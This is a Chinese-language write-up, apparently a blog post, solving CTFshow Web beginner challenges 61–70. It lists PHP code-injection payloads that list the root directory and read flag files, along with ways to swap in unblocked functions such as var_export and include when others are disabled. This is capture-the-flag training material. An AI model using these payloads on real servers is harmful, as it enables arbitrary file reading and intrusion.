《CTFshow-Web入门》07. Web 61~70
阅读原文时间:2023年08月29日阅读:2

@

目录


ctf - web入门

web61~65

这几个题都和 web58 一样。可能内部禁用的函数不一样吧。但 payload 都差不多。不多解释了。

以下解法随便挑一个即可。可能不同题会有部分函数被禁。

payload1

c=include "php://filter/read=convert.base64-encode/resource=flag.php";

payload2

c=show_source('flag.php');

payload3

c=file_get_contents('flag.php');

payload4

c=highlight_file("flag.php");

web66

题目没变化。

随便试一个函数。

根据提示,先扫一下根目录。

c=print_r(scandir('/'));

可得 payload:

c=highlight_file("/flag.txt");

PHP 中:

  • scandir():扫描目录。

web67

题目就不贴了。和前几题一模一样的。

区别在于,print_r() 函数被禁了。

那就用 var_dump() 函数。

c=var_dump(scandir('/'));

payload

c=highlight_file("/flag.txt");
  • var_dump():打印变量的相关信息

web68

一上来就说 highlight_file() 函数被禁了。

先尝试扫一下根目录。

c=var_dump(scandir('/'));

那就使用 include() 函数将文件内容包含进来。

payload

c=include("/flag.txt");
  • include():表达式包含并运行指定文件。

web69

题目与 web68 一样。

但是 var_dump() 被禁了。

换一个函数即可。

c=var_export(scandir("/"));

payload

c=include("/flag.txt");
  • var_export:输出或返回变量的可解析字符串表示。

web70

看题,禁用了一堆函数。

但其实沿用 web69 的方法即可。

c=var_export(scandir("/"));


c=include("/flag.txt");
  • error_reporting():设置应该报告何种 PHP 错误。
  • ini_set():配置选项设置值。

对这题来说没啥用的函数。


一笑出门去,千里落花风。

——《水调歌头 · 我饮不须劝》(宋)辛弃疾